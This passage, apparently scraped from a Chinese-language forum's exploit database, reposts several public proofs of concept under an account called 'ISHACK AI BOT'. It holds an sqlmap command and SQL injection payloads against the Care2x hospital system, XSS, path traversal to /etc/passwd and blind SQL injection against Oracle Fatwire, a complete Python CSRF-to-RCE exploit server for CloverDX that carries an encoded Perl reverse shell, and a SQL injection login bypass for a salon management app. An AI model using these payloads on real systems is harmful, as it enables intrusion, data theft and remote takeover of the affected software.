Xxx __VIEWSTATEGENERATOR: 4A5A1A0F __EVENTVALIDATION: Xxx ctl00$MainContent$UserName: eforce ctl00$MainContent$Password: 123456 ctl00$MainContent$btnLogin.x: 20 ctl00$MainContent$btnLogin.y: 7 Response: Invalid password entered for username eforce. Request/response for non-existent username: ------------------------------------------- POST /eFORCECommand/Account/Login.aspx HTTP/1.1 __LASTFOCUS: __EVENTTARGET: __EVENTARGUMENT: __VIEWSTATE: Xxx __VIEWSTATEGENERATOR: 4A5A1A0F __EVENTVALIDATION: Xxx ctl00$MainContent$UserName: testingus ctl00$MainContent$Password: 123456 ctl00$MainContent$btnLogin.x: 20 ctl00$MainContent$btnLogin.y: 7 Response: Unable to login: User name testingus is not registered.
  22. ISHACK AI BOT

    Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection # Date: 29.07.2021 # Exploit Author: securityforeveryone.com # Vendor Homepage: https://care2x.org # Software Link: https://sourceforge.net/projects/care2002/ # Version: =< 2.7 Alpha # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com DESCRIPTION In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters. The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php". Example: /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION # GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1 # Host: Target Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg
  23. ISHACK AI BOT

    Oracle Fatwire 6.3 - Multiple Vulnerabilities

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities # Date: 29/07/2021 # Exploit Author: J. Francisco Bolivar @Jfran_cbit # Vendor Homepage: https://www.oracle.com/index.html # Version: 6.3 # Tested on: CentOS 1. Xss Adt parameter is vulnerable to Xss: https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img src="a" onerror=alert(document.cookie);> 2. Path Traversal https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 3. Blind Sql injection POST /cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice HTTP/1.1 Host: IPaddress pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX The vulnerable parameter is : id_ex (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND 3958=3958&command=xxxxxT
  24. ISHACK AI BOT

    CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE) # Date: 14.04.2021 # Exploit Author: niebardzo # Vendor Homepage: https://www.cloverdx.com/ # Software Link: https://github.com/cloverdx/cloverdx-server-docker # Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x # Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker # CVE : CVE-2021-29995 # Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX # Victim authenticated to CloverDX and the java to run the ViewStateCracker.java. # Reference for cracking ViewState: # https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html # https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 # import http.server import socketserver import requests from urllib.parse import urlparse from urllib.parse import parse_qs from bs4 import BeautifulSoup import subprocess import sys import json class ExploitHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") self.end_headers() # replace with your own target target = "http://localhost:8080" query_comp = parse_qs(urlparse(self.path).query) if "target" in query_comp: target = query_comp["target"][0] req = requests.get(target+"/clover/gui/login.jsf") if req.status_code != 200: sys.exit(-1) # parse the reponse retrieve the ViewState soup = BeautifulSoup(req.text, "html.parser") cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"] # Use the ViewstateCracker.java to get new Viewstate. new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state]) new_view_state = new_view_state.decode("utf-8").strip() print(new_view_state) if new_view_state == "6927638971750518694:6717304323717288036": html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>" + "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>") else: html = ("<!DOCTYPE html><html><head>" + "<script>" + "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}" + "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}" + "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}" + "function exec4(){document.getElementById('form4').submit();}" + "</script>" + "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>" + "<script>history.pushState('','/');</script>" + "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" + "<input type='hidden' value='headerForm&#58;manualListenerItem' name='javax.faces.source'>" + "<input type='hidden' value='@all' name='javax.faces.partial.execute'>" + "<input type='hidden' value='allContent' name='javax.faces.partial.render'>" + "<input type='hidden' value='headerForm&#58;manualListenerItem' name='headerForm&#58;manualListenerItem'>" + "<input type='hidden' value='headerForm' name='headerForm'>" + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;")) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" + "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.source'>" + "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.partial.execute'>" + "<input type='hidden' value='manualListeneForm&#58;taskFormFragment' name='javax.faces.partial.render'>" + "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>" + "<input type='hidden' value='change' name='javax.faces.partial.event'>" + "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>" + "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>" + "<input type='hidden' value='on' name='manualListeneForm&#58;saveRunRecord_input'>" + "<input type='hidden' value='true' name='manualListeneForm&#58;manualVariablesList_collapsed'>" + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;")) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" + "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>" + "<input type='hidden' value='@all' name='javax.faces.partial.execute'>" + "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>" + "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm&#58;execute_button'>" + "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>" + "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propName'>" + "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propValue'>" + "<input type='hidden' value='' name='manualListeneForm&#58;taskType_focus'>" + "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>" # # Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode. # + "<input type='hidden' value='&#x70;&#x65;&#x72;&#x6c;&#x20;&#x2d;&#x65;&#x20;&#x27;&#x75;&#x73;&#x65;&#x20;&#x53;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x3b;&#x24;&#x69;&#x3d;"&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x36;&#x35;&#x2e;&#x32;"&#x3b;&#x24;&#x70;&#x3d;&#x34;&#x34;&#x34;&#x34;&#x3b;&#x73;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x28;&#x53;&#x2c;&#x50;&#x46;&#x5f;&#x49;&#x4e;&#x45;&#x54;&#x2c;&#x53;&#x4f;&#x43;&#x4b;&#x5f;&#x53;&#x54;&#x52;&#x45;&#x41;&#x4d;&#x2c;&#x67;&#x65;&#x74;&#x70;&#x72;&#x6f;&#x74;&#x6f;&#x62;&#x79;&#x6e;&#x61;&#x6d;&#x65;&#x28;"&#x74;&#x63;&#x70;"&#x29;&#x29;&#x3b;&#x69;&#x66;&#x28;&#x63;&#x6f;&#x6e;&#x6e;&#x65;&#x63;&#x74;&#x28;&#x53;&#x2c;&#x73;&#x6f;&#x63;&#x6b;&#x61;&#x64;&#x64;&#x72;&#x5f;&#x69;&#x6e;&#x28;&#x24;&#x70;&#x2c;&#x69;&#x6e;&#x65;&#x74;&#x5f;&#x61;&#x74;&#x6f;&#x6e;&#x28;&#x24;&#x69;&#x29;&#x29;&#x29;&#x29;&#x7b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x49;&#x4e;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x4f;&#x55;&#x54;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x45;&#x52;&#x52;&#x2c;">&&#x53;"&#x29;&#x3b;&#x65;&#x78;&#x65;&#x63;&#x28;"&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x2d;&#x69;"&#x29;&#x3b;&#x7d;&#x3b;&#x27;' name='manualListeneForm&#58;shellEditor'>" + "<input type='hidden' value='' name='manualListeneForm&#58;workingDirectory'>" + "<input type='hidden' value='10000' name='manualListeneForm&#58;timeout'>" + "<input type='hidden' value='true' name='manualListeneForm&#58;scriptVariablesList_collapsed'>" + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;")) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>" + "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>" + "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>" + "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>" + "</body></html>") self.wfile.write(bytes(html,"utf-8")) base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg==" # # This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 # with open("ViewstateCracker.java","w") as f: f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8')) exploit_handler = ExploitHandler PORT = 6010 exploit_server = socketserver.TCPServer(("", PORT), exploit_handler) exploit_server.serve_forever()
  25. ISHACK AI BOT

    Men Salon Management System 1.0 - SQL Injection Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Men Salon Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-07-30 # Exploit Author: Akshay Khanna (ConfusedBot) # Vendor Homepage: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Kali Linux *POC* Step 1 - Go to URL http://localhost:8080/Men/Salon/Management/System/Project/msms/admin/index.php Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to admin ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /Men/Salon/Management/System/Project/msms/admin/index.php HTTP/1.1 Host: localhost:8080 Content-Length: 67 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/Men%20Salon%20Management%20System%20Project/msms/admin/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fmo6opiohab5jf02r13db3f459 Connection: close username=admin+%27+or+%271%27%3D%271%27%23&password=a&login=Sign+In